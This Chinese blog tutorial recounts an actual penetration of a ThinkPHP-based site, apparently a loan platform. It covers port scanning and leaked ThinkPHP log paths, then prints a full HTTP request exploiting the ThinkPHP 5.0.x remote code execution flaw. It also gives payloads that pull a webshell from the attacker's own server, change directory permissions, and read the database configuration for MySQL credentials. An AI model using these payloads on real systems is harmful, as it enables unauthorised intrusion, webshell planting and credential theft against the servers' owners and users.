您的位置:首页 > 技术中心 > php框架 >

记一个ThinkPHP框架的渗透实战

时间:2022-02-08 09:38

下面thinkphp框架教程栏目将给大家分享一个ThinkPHP框架渗透实战,希望对需要的朋友有所帮助!

信息收集

找到一个网站 http://x.x.x.x/ 下面开始对他进行渗透

首先使用nmap对受害服务器开放的端口扫描探测端口

2a32f398cda2c41b742fd5a2bee4a7f.png

可以看到开放的端口如下
f22d150eae88c25198130f3d47d6cae.png

端口就是应用程序在计算机通信中的唯一识别id,通过端口我们就能知道受害服务器开放了什么服务

如3306是mysql并开启了外联,接下来我们对端口访问看看具体开放了什么服务

8080开放了phpmyadmin一款php连接mysql工具我们可以利用他爆破mysql密码

83f44c18e6db7bbfeb1f791b7848cc3.png

8082是一个贷款首页

3038b567cff24183e1d9bbc495e94ea.png

随便输入一个不存在的路由然后查看错误信息如http://x.x.x.x/gfvhf

01ca4afe268691ffa9d6ae4b162afac.png

成功报错:thinkphp框架的版本是5.1.7(这个版本有注入漏洞)

0204bcf99e8aa2c62f0e074bde1764c.png

8084是一个后台继续收集

728661d589407da47989c6d5a3228fc.png

8092是一个后台,因为部署不规范存在thinkphp日志泄露,路径 http://x.x.x.x:8092/runtime/log/202112/19.log 可以到里面查看到管理员登录过的账号密码。

这里说一下黑产使用thinkphp框架因为运维半吊子很有可能有thinkphp日志泄露

tp5-6 payload: 域名/runtime/log/202112/19.log (后面的202112/19.log是根据当前日期变化的)

tp3 payload: 域名 /Application/Runtime/Logs/Home/21_12_19.log (后面的21_12_19.log是根据当前日期变化的)

fb08bb4da1e17b09f6c14416f43a86a.png

8083端口使用的thinkphp版本是5.0.15,5.0.15版本的利用条件低挑软柿子捏就这个吧

37d9b796bc4dea0a046ef5ecff567dc.png

信息收集完毕精准打击

打开burp,然后使用抓包,然后将数据包转发到burp的Repeater模块下,将抓包内容替换成如下内容

漏洞原理就不做详细讲解了,没个php架构层是听不懂的。简单描述一下就是一个变量覆盖造成代码执行

thinkphp5漏洞poc可参考 https://y4er.com/post/thinkphp5-rce/

下面数据包内容是触发漏洞让服务器执行phpinfo()

POST /index.php?s=captcha&echod=phpinfo() HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=iar4j14536rat57j1d5018qjtt8vj69g
Content-Type:application/x-www-form-urlencoded
Content-Length: 77

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod

执行成功,可以看到php的一些详细信息

dcf30081f648320ff1c18c67f9467e5.png

下面开始写入shell将请求头替换成:

POST /index.php s=captcha&echod=copy('http://x.x.x.x/2.txt','t2.php') HTTP/1.1

意思是将我服务器上远程的shell文件http://x.x.x.x/2.txt下载,写入到当前web目录下的t2.php

但我访问t2.php,出现404猜测应该是当前目录没有写权限

于是尝试给写权限:

POST /index.php?s=captcha&echod=chmod('./',0777) HTTP/1.1

发现还是写不了shell,php权限很低。

将chmod('./',0777) 替换成readfile('../application/database.php')读取数据库配置文件。发现成功获取到mysql账号密码。

b3bb7ac31b356d18d6beb40e8a68a75.png

使用我们之前发现的phpmyadmin服务登录然后mysql开启外联

使用mysql管理工具连接,发现一堆数据库。并且mysql直接是root权限,可以对服务器进行提权(内网横向渗透)等。反正外网以经开了一个口子,这里我就不深入了。

acc13f1330dca3964996289d823712e.png

总结

总结一下我自己摸索出来的一些思路:thinkphp在开启debug模式下如果服务器开启了数据库外联,可以通过爆破mysql服务发送大量请求(让mysql堵塞),使thinkphp连接mysql超时就会报连接异常错误,并将mysql账号密码输出到页面上。

推荐学习:《thinkphp视频教程》

以上就是记一个ThinkPHP框架的渗透实战的详细内容,更多请关注gxlsystem.com其它相关文章!

热门排行

今日推荐

热门手游